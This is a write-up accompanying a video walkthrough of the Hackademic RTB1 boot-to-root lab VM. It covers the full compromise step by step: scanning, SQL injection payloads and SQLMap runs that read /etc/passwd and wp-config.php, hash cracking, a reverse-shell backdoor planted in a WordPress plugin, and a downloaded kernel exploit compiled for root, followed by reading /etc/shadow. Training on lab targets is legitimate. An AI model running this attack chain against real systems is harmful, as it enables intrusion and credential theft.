[Video] Hackademic RTB1

[g0tmi1k]

Links
Watch video on-line: http://blip.tv/g0tmi1k/hackademic-rtb1-5866864
Download video: http://www.mediafire.com/?9d45sfd7j8m531t

Brief Overview
Hackademic is the first in a collection of "boot-to-root" operating systems which has purposely designed weakness(es) built into it. The user's end goal is to interact with it and get the highest user privilege they can.


Method

• Scanned network for the target [NetDiscover]
• Port scanned the target [UnicornScan]
• Banner grabbed the services running on the open port(s) [NMap]
• Interacted with the web server & enumerated the web application [Firefox & WPScan]
• Discovered & exploit an SQL injection vulnerably and download the configuration files [Exploit-DB & SQLMap]
• Brute Force the user credentials for the web application [John The Ripper]
• Hijacked a plugin for the the web application with a web shell backdoor [Pentestmonkey's Php-Reverse-Shell]
• Escalated privileges via a vulnerable kernel version [RDS Protocol exploit]
• Accessed the 'flag' [Text file]
• Discovered other 'interesting files' [Forensics analysis?]

What do I need?

• Hackademic.RTB1.zip (MD5: C972E899A8B5A745963BEF78FBCAEC6F).
• A virtual machine (Example: VMware Player or Virtual Box).
• NetDiscover – (Can be found in BackTrack 5).
• UnicornScan – (Can be found in BackTrack 5's repository).
• NMap – (Can be found in BackTrack 5).
• Firefox – (Can be found in BackTrack 5).
• WPScan – (Can be found in BackTrack 5's repository).
• SQLMap – (Can be found in BackTrack 5).
• John The Ripper – (Can be found in BackTrack 5).
• php-reverse-shell – (Can be found in BackTrack 5).
• NetCat – (Can be found in BackTrack 5).
• RDS Protocol – (Found on exploit-db.com & Can be found in BackTrack 5).

Walkthrough
To start the attack, the target needs to be located. By using "NetDiscover" it is able to quickly list all IP's, Media Access Control (MAC) addresses and known vendors in the same subnet. As the attacker knows that the target is using VMware and the target hasn't spoofed their MAC address, they notice only one VMware vendor therefore they can successfully identify the target.

The attacker now concentrates on the target's single IP address by port scanning every TCP and UDP port. "UnicornScan" reported one open port, TCP 80 (HTTP), which the attacker then verifies by using "nmap". During the port scan the attacker uses nmap's scripting engine to detect the service on the port (which is a web server) and banner grab (which possible enumerates software and it's version). Depending on the outcome of the scan, nmap then executes other scripts. In this instance the http methods were detected (which shows what options are supported by an HTTP server) along with the page's title. Nmap also tries to fingerprint the operating system (Linux 2.6.22-2.6.36).

By inspecting the web service the attacker is able to see if any web application is running and if they are able to interact with it. The web server responds when the attacker views the contents using "firefox". They are then presented with a page that has a message from the target's author forwarding them along to another page. Upon following the link, the attacker then views the blog. By viewing the page source code the attacker notices a possible web product that could be used to power the blog along with its version.

To confirm their findings the attacker installs and runs "wpscan", which is a vulnerability scanner specifically designed for the blogging software, wordpress. This program will automate the process of identifying known vulnerabilities using various different techniques. WPScan confirms its wordpress and its version along with a known vulnerability.

The attacker searches a public exploit database, "exploit-db", to see if they are able to find the exploit which was mentioned in wpscan. The database returned six exploits for wordpress. The attacker views the content of the first exploit code to discover how it functions. Editor's note: When executing the exploit and targeting the target, the exploit didn't work, same with the exploit reported by wpscan.

The attacker moves back to firefox and using the exploit code, manually tests for the same SQL injection vulnerability. Upon requesting the malformed URL with the injection code present, the attacker notices an SQL error message on the side, therefore confirming that the web application is vulnerable. The attacker then starts the process of SQL injection. To start off with the attacker needs to know the number of columns within the query that is to be injected into, which is done by increasing the value tested by 1 until they reach an error. Once the amount is known, they need to be able to locate the output of the SQL query on the page. Once this is done the attacker is able to start enumerating the back end database, by finding out the version, current user and current database in use. They are also able to read files locally (as long as the database service has permission to do so) on the server too, by encoding the filename into base64.

To speed up the SQL injection process, the attacker switches to "SQLMap" which automates a lot of the work. The attacker repeats what was done before manually now with sqlmap automatically to demonstrate how simpler the process now is. At the same time they collect hashed passwords to the database. The attacker continues by trying to view the web server configuration file(s). They start off by locating their local file, to see if it matches the targets and attempts to access it - which fails. They keep trying to access other possible default locations (source) until they are successful. After viewing the file the attacker now knows the local path of the root folder for the web server. From here the attacker wants to download the configuration file which is used for the blog software. As the blog needs to store the credentials to the database to be able to access it, the attacker tries the default filename for wordpress that contains the configuration. After sqlmap downloads the file, the attacker now has the credentials in plain-text to the MySQL database.

The attacker then uses the hash which was collected by SQLMap to validate the configuration file by using "John The Ripper" (which has to have the 'jumbo' patch (aka community - enhanced version) applied to support the MySQL hash format).

Now the attacker sets out to obtain the user credentials to the blog via the SQL injection. By viewing the wordpress documents, they are able to understand the Database Description. They discover there are 6 users registered and the fields used to store all their values. The attacker creates a simple loop to request each user's username and password (which is stored in a hash format). Editor's note: This could have been automated using SQLMap.

After the user's password hashes have been saved the attacker starts to brute force their passwords using a wordlist. After all the values have been tested against the hashes the attacker now has five user's passwords in plain-text. The attacker then checks the database to see each user's permission in relation to the blog. However they soon discover the one password which wasn't cracked is the administration password to the blog. They search the computer for another wordlist and attempt to see if that would crack the password - which it did. Editor's note: If the attacker wasn't able to crack the password, they could attempt to either alter another user to become an admin or create another admin account.

[g0tmi1k]

After navigating to the default location of the admin panel, the attacker is able to test out the acquired admin credentials. As a result the attacker now has full control over the blog software (as well as access to the database). The attacker notices that file uploads have been disabled. However instead of enabling them (as well as altering the allowed file types), the attacker opts to edit an un-used plugin instead. The justification of this is once the file has been edited, it's automatically removed from the plugin list so it is less obvious than altered settings which the attacker believes the admin would notice before wanting to enable the plugin again. Also the attacker believes there is a higher chance the admin will check the upload folder rather than checking the files in the plugin folder to the plugin list. The attacker chooses the plugin "textile 1" to replace. Editor's note: Instead of overwriting the file, it could be possible to amend the code at the end, leaving the existing functionality intact.

"php-reverse-shell" by pentest monkey is an interactive shell which is spawned when the PHP code is executed. The attacker copies the contents of the file and pastes it over the plugin. They then update the shell to have the attacker's IP address and a different port. Upon saving the updated plugin with the modified web shell code, when the attacker checks the list of plugins, they discover it has been removed (which also means they are unable to edit the file any more). As the nature is a reverse connection, the attacker needs to have a listener waiting on the same port to catch the request from the web shell when the PHP function is called from the target. The attacker sets up "netcat" to be the listener and then triggers their plugin. The attacker is then able to interact with the target with a command line interface running as the same permission as the web server.

The attacker now tries to escape privileges in-which to gain higher level of access into the system. One common method is by exploiting the kernel (ONLY if it is vulnerable!). The attacker finds the current kernel version out and again searches their local copy exploit-db. The attacker discovers a potential exploit that could work with the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' which would stop the file from compiling, then copies a version to their local web root folder, remove the 'non-code', gives permission to the file to make sure every user has access to the file and then starts a web server.

Controlling the target the attacker locates a folder which they have the permission to write to and execute files from. Upon entering such a path the attacker instructs the target to download the exploit code from the attacker and compile it. After executing the exploit the attacker has now got root access to the target. They then move to the root's personal home folder to locate & view the "key" file which was mentioned in the message at the start of the attack.

Game over

Upon exploring the rest of the file system, the attacker also noticed other 'sensitive' data on the target's machine. For example, bash commands which had been perversity been entered as root by another user earlier, as well as deleted files which were in the trash folder that hasn't yet been removed.

Game over...again!

Commands

Code:

netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.130 -p 1-65535 && us -H -mU -Iv 192.168.0.130 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.130    # -p 80
// firefox -> 192.168.0.130 -> Target (/Hackademic_RTB1/) -> Right click -> View source   # WordPress 1.5.1.1
apt-cache show wpscan
apt-get install wpscan
cd /pentest/web/wpscan/
./wpscan.rb
./wpscan.rb --url http://192.168.0.130/Hackademic_RTB1/
cd /pentest/exploits/exploitdb/
cat files.csv | grep -i wordpress | grep 1.5.1
perl platforms/php/webapps/1033.pl
perl platforms/php/webapps/1033.pl http://192.168.0.130/Hackademic_RTB1 2
cat platforms/php/webapps/1033.pl
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0'
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 1
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 2
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 3
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 4
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 6
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,2,3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,version(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,user(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,database(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5
echo -n /etc/passwd | xxd -p -
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5
cd /pentest/database/sqlmap/
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_passwd
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --banner --current-db --current-user --is-dba
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --tables -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 -D mysql --columns -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --password -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/httpd/conf/httpd.conf
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_httpd_conf_httpd.conf | grep DocumentRoot
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php
cat /pentest/database/sqlmap/output/192.168.0.130/files/_var_www_html_Hackademic_RTB1_wp-config.php
cd /pentest/passwords/john
./john
./john /tmp/crackme --wordlist=/tmp/pass --format=MYSQL
#./john /tmp/crackme --show
firefox wordpress.org -> Database_Description -> WordPress 1.5   # http://codex.wordpress.org/Database_Description/1.5
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,count(*),3,4,5 from wp_users
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users
curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users | grep page | sed 's/.*;\(.*\)&.*/\1/'
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*/\1/'; done   # Could even use the first SQL injection for count
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*/\1/' >> /tmp/wordpress; done

cd /pentest/password/john
./john /tmp/crack --wordlist=/pentest/passwords/wordlists/darkc0de.lst --format=raw-MD5

http://192.168.0.130/Hackademic_RTB1/wp-admin/   # GeorgeMiller // q1w2e3
#Plugins -> Hello Dolly -> Actiavte. Manage -> Files -> textile1.php
cd /pentest/backdoors/web/webshells/
cat php-reverse-shell.php    # Edit IP & port
nc -lvvp 443

curl http://192.168.0.130/Hackademic_RTB1/wp-content/plugins/textile1.php; exit

uname -a

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Local Privilege Escalation"
head platforms/linux/local/15285.c
cp platforms/linux/local/15285.c /var/www/
nano /var/www/15285.c    # add "//" on line 1
chmod +x /var/www/15285.c
/etc/init.d/apache2 start

cd /tmp
wget 192.168.0.162/15285.c -O root.c
gcc root.c -o root
./root

id
ifconfig && uname -a && cat /etc/shadow &&  ls -lAh /root
cat /root/key.txt
#cat /root/.bash_history
#ls -lAh /root/.local/share/Trash/files

Notes

• When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
• Some mistakes in the video are more obvious.
• Instead of using "php-reverse-shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
• The selection area to record was no in align when I recorded it
• It is worth downloading wordpress to be familiar with a default configuration.

Song(s): Xploding Plastix - Kissed By A Kisser & Wolfgang Gartner - Illmerica (Extended Version)
Video length: 14:06
Capture length: 71:19
Blog Post: http://g0tmi1k.blogspot.com/2012/01/...emic-rtb1.html
Forum Post: http://www.backtrack-linux.org/forum...925#post211925